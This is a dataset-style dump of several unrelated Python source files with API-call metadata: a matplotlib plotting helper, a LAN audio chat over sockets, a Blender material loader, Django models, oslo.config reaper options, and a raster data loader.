def add_data(self, x, y, xerr = None, yerr = None, label = None, settings = None, w=None, c=None, alpha=None):
        if settings is None:
settings = copy.copy(self.settings)
else:
settings = copy.copy(settings)
if label is not None:
settings.label = label
if w is not None:
if 'l' not in w:
settings.linestyle = ''
if 'p' in w:
settings.marker = 'o'
if c is not None:
settings.color = c
if alpha is not None:
settings.alpha = alpha
self.data += [_1D_raw_plot_data(x,y, xerr, yerr, settings)]
def _render(self, ax, layout_settings, index, scaler = 1, figure=None):
ax.locator_params(axis='x', nbins=layout_settings.xbins)
ax.locator_params(axis='y', nbins=layout_settings.ybins)
ax.xaxis.set_minor_locator(mpl.ticker.AutoMinorLocator())
ax.yaxis.set_minor_locator(mpl.ticker.AutoMinorLocator())
ax.tick_params(direction='in', which='both', top=True, right=True)
if self.settings.xlog == True:
ax.set_xscale('log')
if self.settings.ylog == True:
ax.set_yscale('log')
if self.x_lim is not None:
ax.set_xlim(*self.x_lim)
if self.y_lim is not None:
ax.set_ylim(*self.y_lim)
labels = False
for i in range(len(self.data)):
data = self.data[i]
            if data.x_error is None and data.y_error is None:
ax.plot(data.x_data, data.y_data, **data.settings.plot_settings_to_dict(i, scaler))
else:
pass
# ax.errorbar(a, c, yerr = b/10,ecolor='g',linewidth=1.2,elinewidth=0.7)
if data.settings.label is not None:
labels = True
if self.settings.xlabel is not None:
if layout_settings.share_x == False:
ax.set_xlabel(self.settings.xlabel)
elif index[0] == layout_settings.n_plots_x-1 :
ax.set_xlabel(self.settings.xlabel)
if self.settings.ylabel is not None:
if layout_settings.share_y == False:
ax.set_ylabel(self.settings.ylabel)
elif index[1] == 0 :
ax.set_ylabel(self.settings.ylabel)
if labels == True:
ax.legend()
# TODO add log scale support !!!
if __name__ == '__main__':
from colors import MATERIAL_COLOR, Red
# global settings
g = graph_settings_1D()
g.color = Red[::-1]
g.linewidth = 1
a = plotter_1D(graph_setings=g)
a[0].set_labels('x_label', 'y_label')
a[0].add_data(np.linspace(0,50,200), np.sin(np.linspace(10,50,200)), w = 'p', alpha = 1, c=Red[5])
a[0].add_data(np.linspace(0,50,200), np.sin(np.linspace(10,50,200)), w = 'l', alpha = 0.3, c=Red[5])
# a.plot()
a.save('test1D_single.svg')
a = plotter_1D(plot_layout(n_plots_x = 1,n_plots_y = 2))
a[0].set_labels('x_label', 'y_label')
a[0].add_data(np.linspace(10,50,50), np.random.random([50]))
a[0,1].set_labels('x_label', 'y_label')
a[0,1].add_data(np.linspace(10,50,50), np.random.random([50]))
a.save('test1D_12.svg')
# a.plot()
a = plotter_1D(plot_layout(n_plots_x = 2,n_plots_y = 2, share_x=True, share_y=True))
a[0].set_labels('x_label', 'y_label')
a[0].add_data(np.linspace(10,50,50), np.random.random([50]), label='test 1')
a[0,1].set_labels('x_label', 'y_label')
a[0,1].add_data(np.linspace(10,50,50), np.random.random([50]), label='test 2')
a[0,1].add_data(np.linspace(10,50,50), np.random.random([50]))
a[1,0].set_labels('x_label', 'y_label')
a[1,0].add_data(np.linspace(10,50,50), np.random.random([50]))
a[1,1].set_labels('x_label', 'y_label')
a[1,1].add_data(np.linspace(10,50,50), np.sin(np.linspace(10,50,50)))
a.save('test1D_22.svg')
# a.plot()
a = plotter_1D(plot_layout((300, 70), n_plots_x = 6,n_plots_y = 1, share_x=False, share_y=True))
    a[0].set_labels('time (ns)', 'Spin up probability (%)')
a[0].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
    a[1].set_labels('time (ns)', 'Spin up probability (%)')
a[1].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
    a[2].set_labels('time (ns)', 'Spin up probability (%)')
a[2].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
    a[3].set_labels('time (ns)', 'Spin up probability (%)')
a[3].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
    a[4].set_labels('time (ns)', 'Spin up probability (%)')
a[4].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
    a[5].set_labels('time (ns)', 'Spin up probability (%)')
a[5].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
print(a)
a.save('test1D_61.svg')
a.plot() | [((107, 5, 107, 24), 'core_tools.utility.plotting.plot_settings.graph_settings_1D', 'graph_settings_1D', ({}, {}), '()', False, 'from core_tools.utility.plotting.plot_settings import plot_layout, graph_settings_1D, _1D_raw_plot_data\n'), ((10, 33, 10, 46), 'core_tools.utility.plotting.plot_settings.plot_layout', 'plot_layout', ({}, {}), '()', False, 'from core_tools.utility.plotting.plot_settings import plot_layout, graph_settings_1D, _1D_raw_plot_data\n'), ((10, 64, 10, 83), 'core_tools.utility.plotting.plot_settings.graph_settings_1D', 'graph_settings_1D', ({}, {}), '()', False, 'from core_tools.utility.plotting.plot_settings import plot_layout, graph_settings_1D, _1D_raw_plot_data\n'), ((12, 20, 12, 99), 'numpy.empty', 'np.empty', (), '', True, 'import numpy as np\n'), ((19, 18, 19, 43), 'copy.copy', 'copy.copy', ({(19, 28, 19, 42): 'graph_settings'}, {}), '(graph_settings)', False, 'import copy\n'), ((113, 15, 113, 36), 'numpy.linspace', 'np.linspace', ({(113, 27, 113, 28): '(0)', (113, 29, 113, 31): '(50)', (113, 32, 113, 35): '(200)'}, {}), '(0, 50, 200)', True, 'import numpy as np\n'), ((114, 15, 114, 36), 'numpy.linspace', 'np.linspace', ({(114, 27, 114, 28): '(0)', (114, 29, 114, 31): '(50)', (114, 32, 114, 35): '(200)'}, {}), '(0, 50, 200)', True, 'import numpy as np\n'), ((119, 16, 119, 56), 'core_tools.utility.plotting.plot_settings.plot_layout', 'plot_layout', (), '', False, 'from core_tools.utility.plotting.plot_settings import plot_layout, graph_settings_1D, _1D_raw_plot_data\n'), ((122, 15, 122, 36), 'numpy.linspace', 'np.linspace', ({(122, 27, 122, 29): '(10)', (122, 30, 122, 32): '(50)', (122, 33, 122, 35): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((122, 38, 122, 60), 'numpy.random.random', 'np.random.random', ({(122, 55, 122, 59): '[50]'}, {}), '([50])', True, 'import numpy as np\n'), ((125, 17, 125, 38), 'numpy.linspace', 'np.linspace', ({(125, 29, 125, 31): '(10)', (125, 32, 125, 34): '(50)', (125, 35, 125, 37): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((125, 40, 125, 62), 'numpy.random.random', 'np.random.random', ({(125, 57, 125, 61): '[50]'}, {}), '([50])', True, 'import numpy as np\n'), ((131, 16, 131, 84), 'core_tools.utility.plotting.plot_settings.plot_layout', 'plot_layout', (), '', False, 'from core_tools.utility.plotting.plot_settings import plot_layout, graph_settings_1D, _1D_raw_plot_data\n'), ((134, 15, 134, 36), 'numpy.linspace', 'np.linspace', ({(134, 27, 134, 29): '(10)', (134, 30, 134, 32): '(50)', (134, 33, 134, 35): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((134, 38, 134, 60), 'numpy.random.random', 'np.random.random', ({(134, 55, 134, 59): '[50]'}, {}), '([50])', True, 'import numpy as np\n'), ((137, 17, 137, 38), 'numpy.linspace', 'np.linspace', ({(137, 29, 137, 31): '(10)', (137, 32, 137, 34): '(50)', (137, 35, 137, 37): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((137, 40, 137, 62), 'numpy.random.random', 'np.random.random', ({(137, 57, 137, 61): '[50]'}, {}), '([50])', True, 'import numpy as np\n'), ((138, 17, 138, 38), 'numpy.linspace', 'np.linspace', ({(138, 29, 138, 31): '(10)', (138, 32, 138, 34): '(50)', (138, 35, 138, 37): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((138, 40, 138, 62), 'numpy.random.random', 'np.random.random', ({(138, 57, 138, 61): '[50]'}, {}), '([50])', True, 'import numpy as np\n'), ((141, 17, 141, 38), 'numpy.linspace', 'np.linspace', ({(141, 29, 141, 31): '(10)', (141, 32, 141, 34): '(50)', (141, 35, 141, 37): 
'(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((141, 40, 141, 62), 'numpy.random.random', 'np.random.random', ({(141, 57, 141, 61): '[50]'}, {}), '([50])', True, 'import numpy as np\n'), ((144, 17, 144, 38), 'numpy.linspace', 'np.linspace', ({(144, 29, 144, 31): '(10)', (144, 32, 144, 34): '(50)', (144, 35, 144, 37): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((149, 16, 149, 96), 'core_tools.utility.plotting.plot_settings.plot_layout', 'plot_layout', (), '', False, 'from core_tools.utility.plotting.plot_settings import plot_layout, graph_settings_1D, _1D_raw_plot_data\n'), ((152, 15, 152, 36), 'numpy.linspace', 'np.linspace', ({(152, 27, 152, 28): '(0)', (152, 29, 152, 32): '(500)', (152, 33, 152, 35): '(50)'}, {}), '(0, 500, 50)', True, 'import numpy as np\n'), ((155, 15, 155, 36), 'numpy.linspace', 'np.linspace', ({(155, 27, 155, 28): '(0)', (155, 29, 155, 32): '(500)', (155, 33, 155, 35): '(50)'}, {}), '(0, 500, 50)', True, 'import numpy as np\n'), ((158, 15, 158, 36), 'numpy.linspace', 'np.linspace', ({(158, 27, 158, 28): '(0)', (158, 29, 158, 32): '(500)', (158, 33, 158, 35): '(50)'}, {}), '(0, 500, 50)', True, 'import numpy as np\n'), ((161, 15, 161, 36), 'numpy.linspace', 'np.linspace', ({(161, 27, 161, 28): '(0)', (161, 29, 161, 32): '(500)', (161, 33, 161, 35): '(50)'}, {}), '(0, 500, 50)', True, 'import numpy as np\n'), ((164, 15, 164, 36), 'numpy.linspace', 'np.linspace', ({(164, 27, 164, 28): '(0)', (164, 29, 164, 32): '(500)', (164, 33, 164, 35): '(50)'}, {}), '(0, 500, 50)', True, 'import numpy as np\n'), ((167, 15, 167, 36), 'numpy.linspace', 'np.linspace', ({(167, 27, 167, 28): '(0)', (167, 29, 167, 32): '(500)', (167, 33, 167, 35): '(50)'}, {}), '(0, 500, 50)', True, 'import numpy as np\n'), ((37, 14, 37, 38), 'copy.copy', 'copy.copy', ({(37, 24, 37, 37): 'self.settings'}, {}), '(self.settings)', False, 'import copy\n'), ((39, 14, 39, 33), 'copy.copy', 'copy.copy', ({(39, 24, 39, 32): 'settings'}, {}), '(settings)', False, 'import copy\n'), ((52, 16, 52, 60), 'core_tools.utility.plotting.plot_settings._1D_raw_plot_data', '_1D_raw_plot_data', ({(52, 34, 52, 35): 'x', (52, 36, 52, 37): 'y', (52, 39, 52, 43): 'xerr', (52, 45, 52, 49): 'yerr', (52, 51, 52, 59): 'settings'}, {}), '(x, y, xerr, yerr, settings)', False, 'from core_tools.utility.plotting.plot_settings import plot_layout, graph_settings_1D, _1D_raw_plot_data\n'), ((59, 29, 59, 58), 'matplotlib.ticker.AutoMinorLocator', 'mpl.ticker.AutoMinorLocator', ({}, {}), '()', True, 'import matplotlib as mpl\n'), ((60, 29, 60, 58), 'matplotlib.ticker.AutoMinorLocator', 'mpl.ticker.AutoMinorLocator', ({}, {}), '()', True, 'import matplotlib as mpl\n'), ((113, 45, 113, 67), 'numpy.linspace', 'np.linspace', ({(113, 57, 113, 59): '(10)', (113, 60, 113, 62): '(50)', (113, 63, 113, 66): '(200)'}, {}), '(10, 50, 200)', True, 'import numpy as np\n'), ((114, 45, 114, 67), 'numpy.linspace', 'np.linspace', ({(114, 57, 114, 59): '(10)', (114, 60, 114, 62): '(50)', (114, 63, 114, 66): '(200)'}, {}), '(10, 50, 200)', True, 'import numpy as np\n'), ((144, 47, 144, 68), 'numpy.linspace', 'np.linspace', ({(144, 59, 144, 61): '(10)', (144, 62, 144, 64): '(50)', (144, 65, 144, 67): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((152, 45, 152, 66), 'numpy.linspace', 'np.linspace', ({(152, 57, 152, 59): '(10)', (152, 60, 152, 62): '(50)', (152, 63, 152, 65): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((155, 45, 155, 66), 'numpy.linspace', 'np.linspace', ({(155, 57, 155, 59): '(10)', 
(155, 60, 155, 62): '(50)', (155, 63, 155, 65): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((158, 45, 158, 66), 'numpy.linspace', 'np.linspace', ({(158, 57, 158, 59): '(10)', (158, 60, 158, 62): '(50)', (158, 63, 158, 65): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((161, 45, 161, 66), 'numpy.linspace', 'np.linspace', ({(161, 57, 161, 59): '(10)', (161, 60, 161, 62): '(50)', (161, 63, 161, 65): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((164, 45, 164, 66), 'numpy.linspace', 'np.linspace', ({(164, 57, 164, 59): '(10)', (164, 60, 164, 62): '(50)', (164, 63, 164, 65): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((167, 45, 167, 66), 'numpy.linspace', 'np.linspace', ({(167, 57, 167, 59): '(10)', (167, 60, 167, 62): '(50)', (167, 63, 167, 65): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n')] |
Forec/lan-ichat | v0.3/achat.py | f2ae85ef6a8f2b30126be787e52785971c926d8c | # last edit date: 2016/11/2
# author: Forec
# LICENSE
# Copyright (c) 2015-2017, Forec <[email protected]>
# Permission to use, copy, modify, and/or distribute this code for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
from socket import *
import threading
import pyaudio
import wave
import sys
import zlib
import struct
import pickle
import time
import numpy as np
CHUNK = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 2
RATE = 44100
RECORD_SECONDS = 0.5
class Audio_Server(threading.Thread):
def __init__(self, remoteIP, remotePort, remoteVersion) :
threading.Thread.__init__(self)
self.setDaemon(True)
self.ADDR = (remoteIP, remotePort)
if remoteVersion == 4:
self.sock = socket(AF_INET ,SOCK_STREAM)
else:
self.sock = socket(AF_INET6 ,SOCK_STREAM)
self.p = pyaudio.PyAudio()
self.stream = None
def __del__(self):
if self.sock is not None:
self.sock.close()
if self.stream is not None:
try:
self.stream.stop_stream()
self.stream.close()
except:
pass
if self.p is not None:
try:
self.p.terminate()
except:
pass
def run(self):
print ("AUDIO server starts...")
while True:
try:
self.sock.connect(self.ADDR)
break
except:
time.sleep(3)
continue
print ("audio server <-> remote server success connected...")
check = "F"
check = self.sock.recv(1)
if check.decode("utf-8") != "S":
return
data = "".encode("utf-8")
payload_size = struct.calcsize("L")
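        # NOTE: "L" uses the platform's native size and alignment (4 or 8 bytes), so both
        # peers must agree on it; the client packs the length prefix with the same format.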
self.stream = self.p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
output=True,
frames_per_buffer = CHUNK
)
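        # receive loop: each message is a struct-packed length prefix followed by a
        # pickled list of CHUNK-sized audio frames, written straight to the output stream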
while True:
while len(data) < payload_size:
data += self.sock.recv(81920)
packed_size = data[:payload_size]
data = data[payload_size:]
msg_size = struct.unpack("L", packed_size)[0]
while len(data) < msg_size:
data += self.sock.recv(81920)
frame_data = data[:msg_size]
data = data[msg_size:]
frames = pickle.loads(frame_data)
for frame in frames:
self.stream.write(frame, CHUNK)
class Audio_Client(threading.Thread):
def __init__(self ,serverIP, serverPort, serverVersion):
threading.Thread.__init__(self)
self.setDaemon(True)
self.ADDR = (serverIP, serverPort)
if serverVersion == 4:
self.sock = socket(AF_INET, SOCK_STREAM)
else:
self.sock = socket(AF_INET6, SOCK_STREAM)
self.p = pyaudio.PyAudio()
self.stream = None
def __del__(self) :
if self.sock is not None:
self.sock.close()
if self.stream is not None:
try:
self.stream.stop_stream()
self.stream.close()
except:
pass
if self.p is not None:
try:
self.p.terminate()
except:
pass
def run(self):
print ("AUDIO client starts...")
while True:
try:
self.sock.connect(self.ADDR)
break
except:
time.sleep(3)
continue
print ("audio client <-> remote server success connected...")
check = "F"
check = self.sock.recv(1)
if check.decode("utf-8") != "S":
return
print ("remote AUDIO client connected...")
self.stream = self.p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
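        # capture loop: record RECORD_SECONDS worth of CHUNK-sized frames, pickle the
        # list and send it prefixed with its struct-packed length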
while self.stream.is_active():
frames = []
for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
data = self.stream.read(CHUNK)
frames.append(data)
senddata = pickle.dumps(frames)
try:
self.sock.sendall(struct.pack("L", len(senddata)) + senddata)
except:
break | [((37, 8, 37, 39), 'threading.Thread.__init__', 'threading.Thread.__init__', ({(37, 34, 37, 38): 'self'}, {}), '(self)', False, 'import threading\n'), ((44, 17, 44, 34), 'pyaudio.PyAudio', 'pyaudio.PyAudio', ({}, {}), '()', False, 'import pyaudio\n'), ((75, 23, 75, 43), 'struct.calcsize', 'struct.calcsize', ({(75, 39, 75, 42): '"""L"""'}, {}), "('L')", False, 'import struct\n'), ((98, 8, 98, 39), 'threading.Thread.__init__', 'threading.Thread.__init__', ({(98, 34, 98, 38): 'self'}, {}), '(self)', False, 'import threading\n'), ((105, 17, 105, 34), 'pyaudio.PyAudio', 'pyaudio.PyAudio', ({}, {}), '()', False, 'import pyaudio\n'), ((92, 21, 92, 45), 'pickle.loads', 'pickle.loads', ({(92, 34, 92, 44): 'frame_data'}, {}), '(frame_data)', False, 'import pickle\n'), ((146, 23, 146, 43), 'pickle.dumps', 'pickle.dumps', ({(146, 36, 146, 42): 'frames'}, {}), '(frames)', False, 'import pickle\n'), ((87, 23, 87, 54), 'struct.unpack', 'struct.unpack', ({(87, 37, 87, 40): '"""L"""', (87, 42, 87, 53): 'packed_size'}, {}), "('L', packed_size)", False, 'import struct\n'), ((67, 16, 67, 29), 'time.sleep', 'time.sleep', ({(67, 27, 67, 28): '(3)'}, {}), '(3)', False, 'import time\n'), ((128, 16, 128, 29), 'time.sleep', 'time.sleep', ({(128, 27, 128, 28): '(3)'}, {}), '(3)', False, 'import time\n')] |
dennereed/paleocore | gdb/util.py | d6da6c39cde96050ee4b9e7213ec1200530cbeee | from gdb.models import *
| [] |
razortheory/who-iwg-webapp | iwg_blog/blog/views/__init__.py | e2318d286cd9ab87d4d8103bc7b3072cfb99bf76 | from .base import ArticleView, ArticlePreviewView, ArticleListView, SearchView, LandingView, \
CategoryView, TagView, SubscribeForUpdates, UnsubscribeFromUpdates
from .ajax import GetArticleSlugAjax, TagsAutocompleteAjax
from .errors import page_not_found, server_error
| [] |
snake-biscuits/io_import_rbsp | io_import_rbsp/rbsp/rpak_materials.py | 0de47dc70c373cc0417cc222d5d83e6dde72068b | # by MrSteyk & Dogecore
# TODO: extraction instructions & testing
import json
import os.path
from typing import List
import bpy
loaded_materials = {}
MATERIAL_LOAD_PATH = "" # put your path here
# normal has special logic
MATERIAL_INPUT_LINKING = {
"color": "Base Color",
"rough": "Roughness",
"spec": "Specular",
"illumm": "Emission",
}
def load_material_data_from_name(subpath):
full_path = MATERIAL_LOAD_PATH + subpath + ".json"
if not os.path.isfile(full_path):
return False
return json.load(open(full_path, "rb"))
def load_image_from_subpath(subpath):
full_path = MATERIAL_LOAD_PATH + subpath
if not os.path.isfile(full_path):
return False
return bpy.data.images.load(full_path)
def load_materials(bsp) -> List[bpy.types.Material]:
materials = []
for material_name in bsp.TEXTURE_DATA_STRING_DATA:
if material_name in loaded_materials:
materials.append(loaded_materials[material_name])
continue
mat_data = load_material_data_from_name(material_name)
material = bpy.data.materials.new("materials/" + material_name)
if not mat_data:
loaded_materials[material_name] = material
materials.append(material)
# raise ValueError(f"Material data for material {material_name} does not exist!")
continue
# print(material_name, mat_data)
material.use_nodes = True
bsdf = material.node_tree.nodes["Principled BSDF"]
# data link
for mat_data_entry in MATERIAL_INPUT_LINKING.keys():
texture_file = mat_data[mat_data_entry]
if texture_file == "":
print(f"Texture type {mat_data_entry} doesn't exist in {material_name}'s material data, skipping.")
continue
img = load_image_from_subpath(texture_file)
if not img:
raise ValueError(f"{material_name}'s texture {texture_file} ({mat_data_entry}) doesn't exist!")
tex = material.node_tree.nodes.new("ShaderNodeTexImage")
tex.image = img
material.node_tree.links.new(bsdf.inputs[MATERIAL_INPUT_LINKING[mat_data_entry]], tex.outputs["Color"])
if mat_data_entry == "color":
material.node_tree.links.new(bsdf.inputs["Alpha"], tex.outputs["Alpha"])
# normal link
if mat_data["normal"] != "":
texture_file = mat_data["normal"]
normalmap = material.node_tree.nodes.new("ShaderNodeNormalMap")
img = load_image_from_subpath(texture_file)
if not img:
raise ValueError(f"Texture {texture_file} for material {material_name} (normal) doesn't exist!")
tex = material.node_tree.nodes.new("ShaderNodeTexImage")
tex.image = img
material.node_tree.links.new(normalmap.inputs["Color"], tex.outputs["Color"])
material.node_tree.links.new(bsdf.inputs["Normal"], normalmap.outputs["Normal"])
loaded_materials[material_name] = material
materials.append(material)
return materials
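

# Usage sketch (hypothetical path; assumes this runs inside Blender's Python with
# MATERIAL_LOAD_PATH pointed at the extracted material JSON/texture tree and `bsp`
# being a parsed map object exposing TEXTURE_DATA_STRING_DATA):
#   materials = load_materials(bsp)
#   for material in materials:
#       print(material.name)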
| [((34, 11, 34, 42), 'bpy.data.images.load', 'bpy.data.images.load', ({(34, 32, 34, 41): 'full_path'}, {}), '(full_path)', False, 'import bpy\n'), ((44, 19, 44, 71), 'bpy.data.materials.new', 'bpy.data.materials.new', ({(44, 42, 44, 70): "'materials/' + material_name"}, {}), "('materials/' + material_name)", False, 'import bpy\n')] |
alldevic/mtauksync | initcmds/models.py | 1a5d325ca8a7878aba5b292d7835546b24bb554c | from django.db import models
TASK_STATUS = (
("c", "created"),
("p", "progress"),
("s", "success"),
("f", "failed")
)
class TaskModel(models.Model):
lastrunned = models.DateTimeField(
"lastrunned", auto_now=False, auto_now_add=False)
taskname = models.CharField("taskname", max_length=50)
status = models.CharField(max_length=1, choices=TASK_STATUS, default='c')
fail = models.TextField("fail", blank=True, null=True)
def __str__(self) -> str:
return f"{self.taskname} - {self.lastrunned}"
class Meta:
        verbose_name = "run"
        verbose_name_plural = "runs"
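

# Usage sketch (illustrative values; assumes Django settings and migrations are in place):
#   from django.utils import timezone
#   TaskModel.objects.create(taskname="sync", lastrunned=timezone.now(), status="p")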
| [((12, 17, 13, 57), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((14, 15, 14, 58), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((15, 13, 15, 77), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((16, 11, 16, 58), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import models\n')] |
ttsiouts/aardvark | aardvark/conf/reaper_conf.py | cbf29f332df86814dd581152faf863c0d29ae41c | # Copyright (c) 2018 European Organization for Nuclear Research.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
reaper_group = cfg.OptGroup(
'reaper',
title='Aardvark Service Options',
help="Configuration options for Aardvark service")
reaper_opts = [
cfg.StrOpt('reaper_driver',
default='chance_driver',
help="""
The driver that the reaper will use
Possible choices:
* strict_driver: The purpose of the preemptibles existence is to eliminate the
idling resources. This driver gets all the possible offers
from the relevant hosts and tries to find the best matching
for the requested resources. The best matching offer is the
combination of preemptible servers that leave the least
possible resources unused.
* chance_driver: A valid host is selected randomly and in a number of
preconfigured retries, the driver tries to find the instances
that have to be culled in order to have the requested
resources available.
"""
),
cfg.IntOpt('alternatives',
default=1,
help="""
The number of alternative slots that the reaper will try to free up for
each requested slot.
"""
),
cfg.IntOpt('max_attempts',
default=5,
help="""
The maximum number of attempts the reaper will make while trying to free up
the requested resources for each slot.
"""
),
cfg.ListOpt('watched_aggregates',
default=[],
help="""
The list of aggregate names that the reaper will try to make space in.
Each element of the list can be a single aggregate or a combination of aggregates.
A combination of aggregates is a single string of vertical-line-separated
aggregate names,
e.g. watched_aggregates = agg_name1,agg_name2|agg_name3,...
For each element in the list, a reaper thread will be spawned and the request
will be forwarded to the responsible worker.
If the provided list is empty, only one worker will be spawned, responsible for
the whole system.
"""
),
cfg.StrOpt('job_backend',
default='redis',
choices=('redis', 'zookeeper'),
help="""
The backend to use for distributed task management.
For this purpose the Reaper uses OpenStack Taskflow. The two supported
backends are redis and zookeeper.
"""
),
cfg.StrOpt('backend_host',
default='localhost',
help="""
Specifies the host where the job board backend can be found.
"""
),
]
def register_opts(conf):
conf.register_group(reaper_group)
conf.register_opts(reaper_opts, group=reaper_group)
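

# Usage sketch (standard oslo.config pattern; assumed, not taken from this module):
#   from oslo_config import cfg
#   register_opts(cfg.CONF)
#   # once cfg.CONF(...) has parsed the config files, values are read as e.g.
#   #   cfg.CONF.reaper.reaper_driver, cfg.CONF.reaper.watched_aggregates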
| [((19, 15, 22, 54), 'oslo_config.cfg.OptGroup', 'cfg.OptGroup', (), '', False, 'from oslo_config import cfg\n'), ((26, 4, 45, 5), 'oslo_config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo_config import cfg\n'), ((46, 4, 52, 5), 'oslo_config.cfg.IntOpt', 'cfg.IntOpt', (), '', False, 'from oslo_config import cfg\n'), ((53, 4, 59, 5), 'oslo_config.cfg.IntOpt', 'cfg.IntOpt', (), '', False, 'from oslo_config import cfg\n'), ((60, 4, 77, 5), 'oslo_config.cfg.ListOpt', 'cfg.ListOpt', (), '', False, 'from oslo_config import cfg\n'), ((78, 4, 87, 5), 'oslo_config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo_config import cfg\n'), ((88, 4, 93, 5), 'oslo_config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo_config import cfg\n')] |
jhlee93/WNet-cGAN-Keras | src/Data.py | 89666be91083735c3259e04907bbfbe1c89fc8f8 | import glob
import numpy as np
import rasterio  # needed for the rasterio.open() calls below
class Data:
def __init__(self, path, random=False):
"""
input:
path: path to the folder with subfolders: DSM, PAN, LABEL
            random: bool, load samples randomly rather than in order (get_data also takes its own random flag)
"""
self.DSM = sorted(glob.glob(path+"/DSM/*.tif"))
self.PAN = sorted(glob.glob(path+"/PAN/*.tif"))
self.LABEL = sorted(glob.glob(path+"/LABEL/*.tif"))
if len(self.DSM) != len(self.PAN) or len(self.LABEL) != len(self.PAN):
raise ValueError('DSM, PAN or LABEL do not match')
def get_data(self, start=0, num=10, as_arr=True, random=False):
"""
        function: load `num` DSM/PAN/LABEL tiles starting at `start`, removing them from the path lists
        output: three numpy arrays (or lists if as_arr=False) with the DSM, PAN and LABEL tiles
"""
DSM_out = []
PAN_out = []
LABEL_out = []
if random:
            idx = np.random.choice(list(range(len(self.DSM))), num, replace=False)  # DSM/PAN/LABEL share indices
print('randomly loading {0} tiles from {1} tiles'.format(num, len(self.DSM)))
else:
idx = list(range(start, start+num))
print('loading {0} - {1} image tiles'.format(start, start+num-1))
for i in idx:
DSM_out.append(np.moveaxis(rasterio.open(self.DSM[i]).read(),0,2))
PAN_out.append(np.moveaxis(rasterio.open(self.PAN[i]).read(),0,2))
LABEL_out.append(np.moveaxis(rasterio.open(self.LABEL[i]).read(),0,2))
DSM_remove = [self.DSM[i] for i in idx]
PAN_remove = [self.PAN[i] for i in idx]
LABEL_remove = [self.LABEL[i] for i in idx]
for i in range(len(DSM_remove)):
self.DSM.remove(DSM_remove[i])
self.PAN.remove(PAN_remove[i])
self.LABEL.remove(LABEL_remove[i])
if as_arr:
return np.asarray(DSM_out), np.asarray(PAN_out), np.asarray(LABEL_out)
else:
return DSM_out, PAN_out, LABEL_out
def split_trn_vld_tst(self, vld_rate=0.2, tst_rate=0.0, random=True, seed=10):
np.random.seed(seed)
num = len(self.DSM)
vld_num = int(num*vld_rate)
tst_num = int(num*tst_rate)
print('split into {0} train, {1} validation, {2} test samples'.format(num-vld_num-tst_num, vld_num, tst_num))
idx = np.arange(num)
if random:
np.random.shuffle(idx)
DSM_tst, PAN_tst, LABEL_tst = [self.DSM[k] for k in idx[:tst_num]], [self.PAN[k] for k in idx[:tst_num]], [self.LABEL[k] for k in idx[:tst_num]]
DSM_vld, PAN_vld, LABEL_vld = [self.DSM[k] for k in idx[tst_num:tst_num+vld_num]], [self.PAN[k] for k in idx[tst_num:tst_num+vld_num]], [self.LABEL[k] for k in idx[tst_num:tst_num+vld_num]]
DSM_trn, PAN_trn, LABEL_trn = [self.DSM[k] for k in idx[tst_num+vld_num:]], [self.PAN[k] for k in idx[tst_num+vld_num:]], [self.LABEL[k] for k in idx[tst_num+vld_num:]]
return DSM_trn, PAN_trn, LABEL_trn, DSM_vld, PAN_vld, LABEL_vld, DSM_tst, PAN_tst, LABEL_tst
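

# Usage sketch (hypothetical dataset path):
#   data = Data("/data/train")
#   dsm, pan, label = data.get_data(start=0, num=8)              # arrays, one tile per entry
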